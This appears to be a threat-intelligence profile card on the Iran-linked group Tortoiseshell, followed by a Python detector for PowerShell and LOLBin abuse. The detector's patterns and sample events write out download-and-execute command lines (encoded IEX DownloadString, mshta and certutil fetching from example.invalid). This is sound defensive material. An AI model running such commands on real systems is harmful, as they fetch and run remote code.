Threat Intelligence Tarot
cups · 7
Iran (IRGC-linked)
G1017 · ★★★★★
risk 4/5
✦ The Watering Hole ✦
Tortoiseshell
Imperial Kitten · TA456 · Yellow Liderc
IT companies · Defense contractors · Saudi Arabia · Israel · Kurdish communities
Active since ~2018 · IT sector compromise for downstream access · Defense contractor surveillance · Israel targeting
The Watering Hole does not go to its targets. It goes to the place its targets go - an IT support company, a defense contractor's recruiting portal, a Kurdish news website - and waits. Compromise the supplier, compromise the customer. Compromise the watering hole, drink from every cup.
Tactics & Techniques
ATT&CK Enterprise tactics: RCN Reconnaissance · RDV Resource Development · INI Initial Access · EXC Execution · PRS Persistence · PRV Privilege Escalation · EVA Defense Evasion · CRD Credential Access · DSC Discovery · LAT Lateral Movement · COL Collection · C2 Command and Control · EXF Exfiltration · IMP Impact
Notable Operations
- ◆Saudi Arabian IT company compromise for downstream customer access
- ◆Fake job recruitment lures for defense contractor targeting
- ◆LinkedIn persona operation targeting US defense industry
- ◆Israeli critical infrastructure targeting (2022)
Defenses
- ▸Third-party vendor security assessments and continuous monitoring (NIST CSF: ID.SC)
- ▸Browser isolation for high-risk web browsing (CIS Control 9)
- ▸LinkedIn and social media account validation for recruiter contacts (NIST CSF: PR.AT)
- ▸Endpoint detection for PowerShell and LOLBin abuse (NIST CSF: DE.CM)
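The last defense on the list, detecting PowerShell and LOLBin abuse in endpoint telemetry, is the one that turns most directly into code. The Python below is an added example written for this card; it is not from MITRE ATT&CK or from any vendor report on Tortoiseshell. The process-creation records are constructed, and the indicators it looks for (encoded PowerShell, download cradles, mshta/certutil/rundll32/regsvr32 misuse, Office applications spawning script hosts, the pattern a malicious recruitment document would produce) are generic ones, not indicators attributed to this group. It also shows the edge case a plain string match misses: a download cradle hidden inside a `-EncodedCommand` blob is only visible after decoding the UTF-16LE base64.

```python
"""Heuristic detection of PowerShell and LOLBin abuse in process-creation
telemetry (Sysmon Event ID 1 / Windows Security 4688 style records).

Added example: generic indicators, not Tortoiseshell-specific and not from
MITRE ATT&CK. All sample events below are constructed for illustration."""
import base64
import re

# (regex, label) pairs matched case-insensitively against the PowerShell
# command line plus the decoded -EncodedCommand payload, when one is present.
POWERSHELL_PATTERNS = [
    (r"-e(c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", "encoded command"),
    (r"-nop\b|-noprofile\b", "profile bypass"),
    (r"-w(indowstyle)?\s+hidden", "hidden window"),
    (r"-ep\s+bypass|-executionpolicy\s+bypass", "execution policy bypass"),
    (r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient",
     "download cradle"),
    (r"\biex\b|invoke-expression", "in-memory execution"),
    (r"frombase64string", "base64 decoding"),
]

# LOLBin image name -> command-line pattern that separates abuse from
# routine administrative use of the same binary.
LOLBIN_PATTERNS = {
    "mshta.exe": r"https?://|vbscript:|javascript:",
    "rundll32.exe": r"javascript:|url\.dll|\\(temp|appdata)\\",
    "regsvr32.exe": r"/i:https?://|scrobj\.dll",
    "certutil.exe": r"-urlcache|-decode|-encode",
    "bitsadmin.exe": r"/transfer|/addfile",
}

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
                "wscript.exe", "cscript.exe", "rundll32.exe", "regsvr32.exe",
                "certutil.exe"}


def basename(path):
    """Lower-cased file name of a Windows path (handles missing parent)."""
    return path.rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if absent/invalid.
    PowerShell expects base64 of UTF-16LE text, so decode with that codec."""
    m = re.search(r"-e(c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})", cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(2)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(event):
    """Return a list of finding labels for one process-creation event."""
    image = basename(event["image"])
    parent = basename(event.get("parent_image", ""))
    cmdline = event.get("command_line", "")
    findings = []

    if image in {"powershell.exe", "pwsh.exe"}:
        text = cmdline
        decoded = decode_encoded_command(cmdline)
        if decoded:
            text = cmdline + " " + decoded  # inspect the hidden payload too
        for pattern, label in POWERSHELL_PATTERNS:
            if re.search(pattern, text, re.I):
                findings.append(label)

    pattern = LOLBIN_PATTERNS.get(image)
    if pattern and re.search(pattern, cmdline, re.I):
        findings.append(f"lolbin:{image}")

    # A document opened from a recruiter lure should never spawn a script host.
    if parent in OFFICE_PARENTS and image in SCRIPT_HOSTS:
        findings.append(f"office-spawned:{image}")
    return findings


def scan(events):
    """Return (event id, findings) for every event that produced a finding."""
    results = []
    for event in events:
        findings = analyze(event)
        if findings:
            results.append((event["id"], findings))
    return results


# Constructed sample telemetry. The encoded blob is built here exactly as
# PowerShell would expect it, so the decode path is exercised for real.
ENCODED_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"
_B64 = base64.b64encode(ENCODED_PAYLOAD.encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"id": "evt-1", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r"powershell.exe -ExecutionPolicy RemoteSigned -File C:\scripts\backup.ps1"},
    {"id": "evt-2", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": f"powershell.exe -nop -w hidden -enc {_B64}"},
    {"id": "evt-3", "image": r"C:\Windows\System32\mshta.exe",
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "command_line": "mshta.exe http://example.invalid/offer.hta"},
    {"id": "evt-4", "image": r"C:\Windows\System32\certutil.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": r"certutil.exe -urlcache -split -f http://example.invalid/x.dat C:\Users\Public\x.dat"},
    {"id": "evt-5", "image": r"C:\Windows\System32\rundll32.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"},
]

if __name__ == "__main__":
    for event_id, findings in scan(SAMPLE_EVENTS):
        print(event_id, ", ".join(findings))
```

The benign backup script (evt-1) and the stock `shell32.dll` Control Panel launch (evt-5) produce no findings, which is the point of keying each LOLBin on a command-line pattern rather than on the image name alone; alerting on every `rundll32.exe` or `certutil.exe` launch would bury the three real hits.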
Reversed: Their Weakness
Tortoiseshell's supply chain approach means that when a victim IT company discovers the compromise, all of its customers must be considered potentially exposed - the resulting notification cascade can generate significant intelligence for defenders about the full scope of operations.
Data sourced from MITRE ATT&CK. For educational purposes.